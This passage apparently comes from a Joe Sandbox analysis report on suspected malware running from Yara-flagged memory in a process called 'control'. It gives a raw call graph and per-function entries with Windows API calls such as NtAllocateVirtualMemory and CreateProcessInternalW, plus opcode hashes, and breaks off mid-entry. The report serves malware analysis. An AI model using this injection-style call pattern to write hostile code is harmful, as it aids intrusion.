25bac30 LdrLoadDll 103749->103750 103751 25badcf 103750->103751 103752 25bac30 LdrLoadDll 103751->103752 103753 25badd8 103752->103753 103754 25bac30 LdrLoadDll 103753->103754 103755 25bade1 103754->103755 103756 25bac30 LdrLoadDll 103755->103756 103757 25badea 103756->103757 103758 25bac30 LdrLoadDll 103757->103758 103759 25badf6 103758->103759 103760 25bac30 LdrLoadDll 103759->103760 103761 25badff 103760->103761 103762 25bac30 LdrLoadDll 103761->103762 103763 25bae08 103762->103763 103764 25bac30 LdrLoadDll 103763->103764 103765 25bae11 103764->103765 103766 25bac30 LdrLoadDll 103765->103766 103767 25bae1a 103766->103767 103768 25bac30 LdrLoadDll 103767->103768 103769 25bae23 103768->103769 103770 25bac30 LdrLoadDll 103769->103770 103771 25bae2f 103770->103771 103772 25bac30 LdrLoadDll 103771->103772 103773 25bae38 103772->103773 103774 25bac30 LdrLoadDll 103773->103774 103775 25bae41 103774->103775 103776 25bac30 LdrLoadDll 103775->103776 103777 25bae4a 103776->103777 103778 25bac30 LdrLoadDll 103777->103778 103779 25bae53 103778->103779 103780 25bac30 LdrLoadDll 103779->103780 103781 25bae5c 103780->103781 103782 25bac30 LdrLoadDll 103781->103782 103783 25bae68 103782->103783 103784 25bac30 LdrLoadDll 103783->103784 103785 25bae71 103784->103785 103786 25bac30 LdrLoadDll 103785->103786 103787 25bae7a 103786->103787 103788 25bac30 LdrLoadDll 103787->103788 103789 25bae83 103788->103789 103790 25bac30 LdrLoadDll 103789->103790 103791 25bae8c 103790->103791 103792 25bac30 LdrLoadDll 103791->103792 103793 25bae95 103792->103793 103794 25bac30 LdrLoadDll 103793->103794 103795 25baea1 103794->103795 103796 25bac30 LdrLoadDll 103795->103796 103797 25baeaa 103796->103797 103798 25bac30 LdrLoadDll 103797->103798 103799 25baeb3 103798->103799 103800 25bac30 LdrLoadDll 103799->103800 103801 25baebc 103800->103801 103802 25bac30 LdrLoadDll 103801->103802 103803 25baec5 103802->103803 103804 25bac30 LdrLoadDll 103803->103804 103805 25baece 103804->103805 103806 25bac30 
LdrLoadDll 103805->103806 103807 25baeda 103806->103807 103808 25bac30 LdrLoadDll 103807->103808 103809 25baee3 103808->103809 103810 25bac30 LdrLoadDll 103809->103810 103811 25baeec 103810->103811 103811->103590 103813 25baf60 LdrLoadDll 103812->103813 103814 25b9edc 103813->103814 103842 4822df0 LdrInitializeThunk 103814->103842 103815 25b9ef3 103815->103511 103817->103587 103819 25baf60 LdrLoadDll 103818->103819 103820 25ba55c NtAllocateVirtualMemory 103819->103820 103820->103690 103822 25bcf40 103821->103822 103823 25bcf46 103821->103823 103822->103695 103824 25bbf90 2 API calls 103823->103824 103825 25bcf6c 103824->103825 103825->103695 103827 25bbdc0 2 API calls 103826->103827 103828 25b4334 103827->103828 103828->103714 103829->103701 103832 25bcfd0 103830->103832 103831 25bd02d 103831->103701 103832->103831 103833 25bbf90 2 API calls 103832->103833 103834 25bd00a 103833->103834 103835 25bbdc0 2 API calls 103834->103835 103835->103831 103837 25bac4b 103836->103837 103838 25b4e50 LdrLoadDll 103837->103838 103839 25bac6b 103838->103839 103840 25b4e50 LdrLoadDll 103839->103840 103841 25bad17 103839->103841 103840->103841 103841->103736 103842->103815 103844 4822c11 103843->103844 103845 4822c1f LdrInitializeThunk 103843->103845 103844->103596 103845->103596 103847 25baf60 LdrLoadDll 103846->103847 103848 25ba68c RtlFreeHeap 103847->103848 103848->103600 103850 25a7eab 103849->103850 103851 25a7eb0 103849->103851 103850->103519 103852 25bbd40 2 API calls 103851->103852 103859 25a7ed5 103852->103859 103853 25a7f38 103853->103519 103854 25b9ec0 2 API calls 103854->103859 103855 25a7f3e 103857 25a7f64 103855->103857 103858 25ba5c0 2 API calls 103855->103858 103857->103519 103860 25a7f55 103858->103860 103859->103853 103859->103854 103859->103855 103861 25bbd40 2 API calls 103859->103861 103865 25ba5c0 103859->103865 103860->103519 103861->103859 103863 25ba5c0 2 API calls 103862->103863 103864 25a817e 103863->103864 103864->103476 103866 25baf60 LdrLoadDll 
103865->103866 103867 25ba5dc 103866->103867 103870 4822c70 LdrInitializeThunk 103867->103870 103868 25ba5f3 103868->103859 103870->103868 103872 25bb5c3 103871->103872 103875 25aacf0 103872->103875 103876 25aad14 103875->103876 103877 25aad50 LdrLoadDll 103876->103877 103878 25a9c4a 103876->103878 103877->103878 103878->103482 103880 25ab063 103879->103880 103882 25ab0e0 103880->103882 103894 25b9c90 LdrLoadDll 103880->103894 103882->103489 103884 25baf60 LdrLoadDll 103883->103884 103885 25af1bb 103884->103885 103885->103492 103886 25ba7d0 103885->103886 103887 25baf60 LdrLoadDll 103886->103887 103888 25ba7ef LookupPrivilegeValueW 103887->103888 103888->103494 103890 25baf60 LdrLoadDll 103889->103890 103891 25ba27c 103890->103891 103895 4822ea0 LdrInitializeThunk 103891->103895 103892 25ba29b 103892->103495 103894->103882 103895->103892 103897 25ab1f0 103896->103897 103898 25ab040 LdrLoadDll 103897->103898 103899 25ab204 103898->103899 103899->103429 103901 25aaf34 103900->103901 103973 25b9c90 LdrLoadDll 103901->103973 103903 25aaf6e 103903->103431 103905 25af3ac 103904->103905 103906 25ab1c0 LdrLoadDll 103905->103906 103907 25af3be 103906->103907 103974 25af290 103907->103974 103910 25af3d9 103912 25ba490 2 API calls 103910->103912 103913 25af3e4 103910->103913 103911 25af3f1 103914 25ba490 2 API calls 103911->103914 103915 25af402 103911->103915 103912->103913 103913->103435 103914->103915 103915->103435 103917 25af43c 103916->103917 103993 25ab2b0 103917->103993 103919 25af44e 103920 25af290 3 API calls 103919->103920 103921 25af45f 103920->103921 103922 25af469 103921->103922 103923 25af481 103921->103923 103924 25af474 103922->103924 103926 25ba490 2 API calls 103922->103926 103925 25af492 103923->103925 103927 25ba490 2 API calls 103923->103927 103924->103437 103925->103437 103926->103924 103927->103925 103929 25acaa6 103928->103929 103930 25acab0 103928->103930 103929->103446 103931 25aaf10 LdrLoadDll 103930->103931 103932 25acb4e 103931->103932 103933 
25acb74 103932->103933 103934 25ab040 LdrLoadDll 103932->103934 103933->103446 103935 25acb90 103934->103935 103936 25b4a50 8 API calls 103935->103936 103937 25acbe5 103936->103937 103937->103446 103939 25ad646 103938->103939 103940 25ab040 LdrLoadDll 103939->103940 103941 25ad65a 103940->103941 103997 25ad310 103941->103997 103943 25a908b 103944 25acc00 103943->103944 103946 25acc26 103944->103946 103945 25acca9 103948 25ab040 LdrLoadDll 103945->103948 103946->103945 103947 25ab040 LdrLoadDll 103946->103947 103947->103945 103949 25acd16 103948->103949 103950 25aaf10 LdrLoadDll 103949->103950 103951 25acd7f 103950->103951 103952 25ab040 LdrLoadDll 103951->103952 103953 25ace2f 103952->103953 103953->103459 103957 25a8d14 103954->103957 104026 25af6d0 103954->104026 103956 25a8f25 103956->103414 103957->103956 104031 25b43a0 103957->104031 103959 25a8d70 103959->103956 104034 25a8ab0 103959->104034 103962 25bcf30 2 API calls 103963 25a8db2 103962->103963 103964 25bd060 3 API calls 103963->103964 103966 25a8dc7 103964->103966 103965 25a7ea0 4 API calls 103965->103966 103966->103956 103966->103965 103969 25ac7b0 18 API calls 103966->103969 103970 25a8160 2 API calls 103966->103970 104039 25af670 103966->104039 104043 25af080 21 API calls 103966->104043 103969->103966 103970->103966 103971->103439 103972->103457 103973->103903 103975 25af2aa 103974->103975 103983 25af360 103974->103983 103976 25ab040 LdrLoadDll 103975->103976 103977 25af2cc 103976->103977 103984 25b9f40 103977->103984 103979 25af30e 103987 25b9f80 103979->103987 103982 25ba490 2 API calls 103982->103983 103983->103910 103983->103911 103985 25baf60 LdrLoadDll 103984->103985 103986 25b9f5c 103985->103986 103986->103979 103988 25b9f9c 103987->103988 103989 25baf60 LdrLoadDll 103987->103989 103992 48235c0 LdrInitializeThunk 103988->103992 103989->103988 103990 25af354 103990->103982 103992->103990 103994 25ab2d7 103993->103994 103995 25ab040 LdrLoadDll 103994->103995 103996 25ab313 103995->103996 
103996->103919 103998 25ad327 103997->103998 104006 25af710 103998->104006 104002 25ad39b 104003 25ad3a2 104002->104003 104017 25ba2a0 LdrLoadDll 104002->104017 104003->103943 104005 25ad3b5 104005->103943 104007 25af735 104006->104007 104018 25a81a0 104007->104018 104009 25af759 104010 25ad36f 104009->104010 104011 25b4a50 8 API calls 104009->104011 104013 25bbdc0 2 API calls 104009->104013 104025 25af550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 104009->104025 104014 25ba6e0 104010->104014 104011->104009 104013->104009 104015 25baf60 LdrLoadDll 104014->104015 104016 25ba6ff CreateProcessInternalW 104015->104016 104016->104002 104017->104005 104019 25a829f 104018->104019 104020 25a81b5 104018->104020 104019->104009 104020->104019 104021 25b4a50 8 API calls 104020->104021 104022 25a8222 104021->104022 104023 25bbdc0 2 API calls 104022->104023 104024 25a8249 104022->104024 104023->104024 104024->104009 104025->104009 104027 25b4e50 LdrLoadDll 104026->104027 104028 25af6ef 104027->104028 104029 25af6fd 104028->104029 104030 25af6f6 SetErrorMode 104028->104030 104029->103957 104030->104029 104033 25b43c6 104031->104033 104044 25af4a0 104031->104044 104033->103959 104035 25bbd40 2 API calls 104034->104035 104038 25a8ad5 104035->104038 104036 25a8cea 104036->103962 104038->104036 104063 25b9880 104038->104063 104040 25af683 104039->104040 104111 25b9e90 104040->104111 104043->103966 104045 25af4bd 104044->104045 104051 25b9fc0 104045->104051 104048 25af505 104048->104033 104052 25baf60 LdrLoadDll 104051->104052 104053 25b9fdc 104052->104053 104061 4822f30 LdrInitializeThunk 104053->104061 104054 25af4fe 104054->104048 104056 25ba010 104054->104056 104057 25baf60 LdrLoadDll 104056->104057 104058 25ba02c 104057->104058 104062 4822d10 LdrInitializeThunk 104058->104062 104059 25af52e 104059->104033 104061->104054 104062->104059 104064 25bbf90 2 API calls 104063->104064 104065 25b9897 104064->104065 104084 25a9310 104065->104084 104067 25b98b2 104068 25b98d9 
104067->104068 104069 25b98f0 104067->104069 104070 25bbdc0 2 API calls 104068->104070 104072 25bbd40 2 API calls 104069->104072 104071 25b98e6 104070->104071 104071->104036 104073 25b992a 104072->104073 104074 25bbd40 2 API calls 104073->104074 104075 25b9943 104074->104075 104080 25b9be4 104075->104080 104090 25bbd80 LdrLoadDll 104075->104090 104077 25b9bc9 104078 25b9bd0 104077->104078 104077->104080 104079 25bbdc0 2 API calls 104078->104079 104081 25b9bda 104079->104081 104082 25bbdc0 2 API calls 104080->104082 104081->104036 104083 25b9c39 104082->104083 104083->104036 104085 25a9335 104084->104085 104086 25aacf0 LdrLoadDll 104085->104086 104087 25a9368 104086->104087 104089 25a938d 104087->104089 104091 25acf20 104087->104091 104089->104067 104090->104077 104092 25acf2c 104091->104092 104093 25ba1e0 LdrLoadDll 104092->104093 104094 25acf65 104093->104094 104095 25acf6c 104094->104095 104102 25ba220 104094->104102 104095->104089 104099 25acfa7 104100 25ba490 2 API calls 104099->104100 104101 25acfca 104100->104101 104101->104089 104103 25ba23c 104102->104103 104104 25baf60 LdrLoadDll 104102->104104 104110 4822ca0 LdrInitializeThunk 104103->104110 104104->104103 104105 25acf8f 104105->104095 104107 25ba810 104105->104107 104108 25baf60 LdrLoadDll 104107->104108 104109 25ba82f 104108->104109 104109->104099 104110->104105 104112 25baf60 LdrLoadDll 104111->104112 104113 25b9eac 104112->104113 104116 4822dd0 LdrInitializeThunk 104113->104116 104114 25af6ae 104114->103966 104116->104114 104117 25b9080 104118 25b9089 104117->104118 104119 25bbd40 2 API calls 104118->104119 104121 25b90bb 104119->104121 104120 25b919c 104121->104120 104122 25aacf0 LdrLoadDll 104121->104122 104123 25b90f1 104122->104123 104124 25b4e50 LdrLoadDll 104123->104124 104126 25b910d 104124->104126 104125 25b9120 Sleep 104125->104126 104126->104120 104126->104125 104129 25b8ca0 LdrLoadDll 104126->104129 104130 25b8eb0 LdrLoadDll 104126->104130 104129->104126 104130->104126

                                                          Control-flow Graph (legend: Executed / Not Executed)
                                                          control_flow_graph 290 25ba35a-25ba3b1 call 25baf60 NtCreateFile
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,025B4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,025B4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 025BA3AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 07184192ed192e94491db6e1c8ec3fbd5f0540bb83b1009677417d7a20cf99ee
                                                          • Instruction ID: 4de624d43a11bf5f28e303386761080e7a02fb4e95d547f2ff73526fdff6e1a4
                                                          • Opcode Fuzzy Hash: 07184192ed192e94491db6e1c8ec3fbd5f0540bb83b1009677417d7a20cf99ee
                                                          • Instruction Fuzzy Hash: 5D01AFB2605218AFCB18CF89DC84EEB77ADEF8C754F158248FA0D97240C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph (legend: Executed / Not Executed)
                                                          control_flow_graph 293 25ba360-25ba376 294 25ba37c-25ba3b1 NtCreateFile 293->294 295 25ba377 call 25baf60 293->295 295->294
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,025B4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,025B4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 025BA3AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction ID: 1b5dae25d6e98e2cf2c4f371e0fee8a0ce910f84f520e0ced4f039ad27adbaf0
                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction Fuzzy Hash: 4EF0BDB2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtReadFile.NTDLL(025B4D72,5EB65239,FFFFFFFF,025B4A31,?,?,025B4D72,?,025B4A31,FFFFFFFF,5EB65239,025B4D72,?,00000000), ref: 025BA455
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction ID: 300a6c5a177208aa09c030227cdc2bbc88a8465f1a4c58ad7adcbf41f7e97f42
                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction Fuzzy Hash: EAF0A4B6200208ABCB14DF89DC84EEB77ADEF8C754F158248BA1D97241D630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,025A2D11,00002000,00003000,00000004), ref: 025BA579
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: 7a33bcad0af6a4aa9c2216e2c0db5cd6d65ebfb4dae7d39e6af8404596113f39
                                                          • Instruction ID: 46490c936126875f2034225e748642ffa869468d64be6d19e36f6d50f4147138
                                                          • Opcode Fuzzy Hash: 7a33bcad0af6a4aa9c2216e2c0db5cd6d65ebfb4dae7d39e6af8404596113f39
                                                          • Instruction Fuzzy Hash: 34F01CB6200108AFDB14DF99CC80EEB77A9FF8C354F118249FE0997240C630E911CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,025A2D11,00002000,00003000,00000004), ref: 025BA579
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction ID: 4e1436b36e1dd6c372609400bd8f4d8abaf30495cf917dd248ca6f1e88368801
                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction Fuzzy Hash: 05F015B6200208ABCB14DF89CC80EEB77ADEF88754F118148BE0897241C630F810CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtClose.NTDLL(025B4D50,?,?,025B4D50,00000000,FFFFFFFF), ref: 025BA4B5
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction ID: 8832688cac3e64e5660c28deeaafb87e840f22abec4da108647724aea95b85fc
                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction Fuzzy Hash: 67D012762002147BD710EB98CC45ED7775DEF84750F154455BA185B241C530F50086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 0c3e64f16e7c52e29b6a0032885625ee24ee908b862b7d680f6815bc564517a1
                                                          • Instruction ID: 465a18438da738d122151f4fe77d92df5eafb9e44b8582e6a1a9468c9b9b2f69
                                                          • Opcode Fuzzy Hash: 0c3e64f16e7c52e29b6a0032885625ee24ee908b862b7d680f6815bc564517a1
                                                          • Instruction Fuzzy Hash: 9090023120140406F1007598540864600558BE0306F55D511B602D555EC665D9D57172
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 82c3408d54c53b4a90c5a9db797a41e5284a2af78920b75c5e73a140491ea126
                                                          • Instruction ID: 9e53806fe832a172ee82d99b1d5e78621e6279260e9c8d7aa90cf5df48aa9167
                                                          • Opcode Fuzzy Hash: 82c3408d54c53b4a90c5a9db797a41e5284a2af78920b75c5e73a140491ea126
                                                          • Instruction Fuzzy Hash: 6190023120140846F10071584404B4600558BE0306F55C516B112D654D8615D9957562
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d9b48898d49335d04fa067b3587ae5e5d99ceed37fa4b2b065fa0f5202c0de0b
                                                          • Instruction ID: eafe453e9b926adc1a8b14403f191035ebeadab3476460334f8f7d447177338e
                                                          • Opcode Fuzzy Hash: d9b48898d49335d04fa067b3587ae5e5d99ceed37fa4b2b065fa0f5202c0de0b
                                                          • Instruction Fuzzy Hash: 1190023120148806F1107158840474A00558BD0306F59C911B542D658D8695D9D57162
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d18c5cbc3fe7302e4012224f7df55f3378ebaca11c12c7e2555c211211f8edf8
                                                          • Instruction ID: a6ecda1e34537dd0f0b5893e49c820d3b44d7e531909e7c75977500a5c694a47
                                                          • Opcode Fuzzy Hash: d18c5cbc3fe7302e4012224f7df55f3378ebaca11c12c7e2555c211211f8edf8
                                                          • Instruction Fuzzy Hash: 0C900221242441567545B158440450740569BE0246795C512B241D950C8526E99AE662
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d1494953e77a0dc5c7b4f31e00ffb151df0f758af84088ceb71b5716f90b744b
                                                          • Instruction ID: 07b59e3d3b082b0fcc9d3dd0abe0ff6b24788060a4d6f63c4247f09b1a420c3b
                                                          • Opcode Fuzzy Hash: d1494953e77a0dc5c7b4f31e00ffb151df0f758af84088ceb71b5716f90b744b
                                                          • Instruction Fuzzy Hash: 5F90023120140417F1117158450470700598BD0246F95C912B142D558D9656DA96B162
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4e1e35f1b0f76acc668f842f2e8dd4b638e4ecd38ae8c3fb96068f419b11f9f8
                                                          • Instruction ID: 169ad5df260164f98d2d2c6456254d2e61a6aba2446aafc69737e0c58277bc89
                                                          • Opcode Fuzzy Hash: 4e1e35f1b0f76acc668f842f2e8dd4b638e4ecd38ae8c3fb96068f419b11f9f8
                                                          • Instruction Fuzzy Hash: 9C90022921340006F1807158540860A00558BD1207F95D915B101E558CC915D9AD6362
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8c06b99e34c59d4c56bd25cb194063b100882b16166e25f727d16781d75423b1
                                                          • Instruction ID: e18e9d00eddddda3afa2c7a971fa0bb0cadff4a999bb7ccfcf27faf038ac5c4b
                                                          • Opcode Fuzzy Hash: 8c06b99e34c59d4c56bd25cb194063b100882b16166e25f727d16781d75423b1
                                                          • Instruction Fuzzy Hash: 6690027120140406F1407158440474600558BD0306F55C511B606D554E8659DED976A6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f98460c7fbbeea4100fde982068fd266b23ab6c4d753fb81e0aa47ce3dd89612
                                                          • Instruction ID: 4127d41b1d1c4aecf58be6fb405d85502b6f1a2334d7825e6150d36e12036f9f
                                                          • Opcode Fuzzy Hash: f98460c7fbbeea4100fde982068fd266b23ab6c4d753fb81e0aa47ce3dd89612
                                                          • Instruction Fuzzy Hash: 47900221211C0046F20075684C14B0700558BD0307F55C615B115D554CC915D9A56562
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: dfaacb43abd7f607c34961e7dfd76b1eefe098bc599e320e4cfcff90b4d0d83d
                                                          • Instruction ID: 268cafd57079f6c4b23ee7342370a8fa749966f76f5e0748a0c94a508e6b1216
